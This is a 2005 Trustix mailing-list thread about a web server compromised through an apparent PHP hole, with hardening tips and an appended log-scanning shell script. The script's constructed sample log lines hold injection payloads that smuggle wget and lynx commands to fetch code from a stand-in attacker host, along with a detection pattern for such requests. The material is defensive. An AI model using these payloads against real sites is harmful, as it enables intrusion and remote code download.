On Wed, 16 Nov 2005, anu bhaskar wrote:

>> A friend who has an httpd server based on TSL 2.2 has received this
>> mail:
>>
>> Subject: Your_host_have_been_attacked
>> Your host have been attacked by pv script. Look on netstat -anp for
>> process listen on 4123 port
>>
>> It tells me that there is a process listening on port 4123 and another on
>> 22222. Stopping httpd and killing the process that owns the daemons seems
>> to temporarily "solve" the problem. He said that those processes are owned
>> by httpd. He is now busy rebuilding a new box to migrate the data to, so he
>> asked me to collect info on the "pv script".
>> Any hints?
>>
> You may have a bad php script on your machine. Check your apache logs
> for traces of injecting bad programs. Specifically grep for the terms
> "wget", "lynx" etc on the apache logs since there is a chance that
> the intruder may have uploaded a php script. Also check if your php has
> any vulnerability.
>
> Some points to secure your server
>
> 1. Turn on the safe mode option in php.ini (caution: some website code
> needs to be rewritten if you do this)

Tried also on my server: users don't like it and say that other ISPs don't
have this limit (it cuts off most of the php scripts they can get from the
net ...)

> 2. Create /tmp as a separate partition and mount it with the noexec option.
> Make symbolic links of other tmps (eg: /var/tmp) to this partition.

Yes, but if it is a good practice, why don't TSL or other distros apply it?
I am testing it on a box of mine (also a TSL 2.2, which is why I am
interested). I have read about problems for other programs (like logrotate).
Following the hints, I have:

----------
Logrotate is run daily per default. The actual script can be found in
/etc/cron.daily/logrotate. To fix this I create a tmp directory, /tmp_safe,
that is going to be used by logrotate only. Then I add the following to the
top of /etc/cron.daily/logrotate.

export TMPDIR=/tmp_safe

Now logrotate will use /tmp_safe as a tmp directory instead of /tmp. All
other applications running on the system will still use /tmp as normal.
----------

But surely there are other programs that use /tmp (properly) ...

> 3. Remove wget, lynx, make etc programs from your server once it is in
> production. Or at least chmod them so that only root can use it ;-)
> 4. Put iptables.

For what I know, the box has only ports 80, 443 and 21 forwarded from the
firewall ... Is iptables still useful?

Thanks,
B.

_______________________________________________
tsl-discuss mailing list
http://lists.trustix.org/mailman/listinfo/tsl-discuss
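Taking the advice in the reply above to grep the apache logs for "wget" and "lynx", here is an added example (not posted in the thread) of a small POSIX shell scanner that goes a little further: it also looks for curl and fetch, handles URL-encoded separators, skips innocent paths that merely contain a tool name, and reports the client addresses behind the matching requests. The access-log lines, addresses, paths and timestamps it works on are constructed samples.

```shell
#!/bin/sh
# Added example: scan an Apache access log for request lines that use a
# download tool as a command, the pattern the reply above suggests grepping
# for. The sample log (addresses, paths, timestamps) is constructed here.
set -eu

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [16/Nov/2005:10:01:12 +0100] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.7 - - [16/Nov/2005:10:02:44 +0100] "GET /index.php?page=http://203.0.113.9/x.txt;wget%20http://203.0.113.9/pv HTTP/1.1" 200 88 "-" "libwww-perl/5.79"
10.0.0.6 - - [16/Nov/2005:10:03:01 +0100] "GET /lynx-browser-review.html HTTP/1.1" 200 5011 "-" "Mozilla/4.0"
192.0.2.8 - - [16/Nov/2005:10:04:19 +0100] "GET /gallery.php?dir=;lynx%20-source%20http://203.0.113.9/pv.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
EOF

# A tool name counts as suspicious only when it is used like a shell command:
# preceded by a separator (';', '|', '&', '=', or their URL-encoded forms)
# and followed by a space (raw, '+' or '%20'). A plain URL path such as
# /lynx-browser-review.html therefore does not match.
PATTERN='(;|\||&|=|%3[bB]|%7[cC]|%26)(wget|lynx|curl|fetch)( |\+|%20)'

# Print the number of matching request lines (0 when there are none).
count_suspicious() {
    grep -Ec "$PATTERN" "$1" || true
}

# Print the distinct client addresses behind the matching requests, one per
# line, so they can be followed through the rest of the logs.
list_sources() {
    grep -E "$PATTERN" "$1" | awk '{ print $1 }' | sort -u
}

echo "suspicious requests: $(count_suspicious "$SAMPLE_LOG")"
echo "source addresses:"
list_sources "$SAMPLE_LOG"
```

Run it against the real log by replacing SAMPLE_LOG with the path of the access log (and the rotated copies, since the upload may predate the current file).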
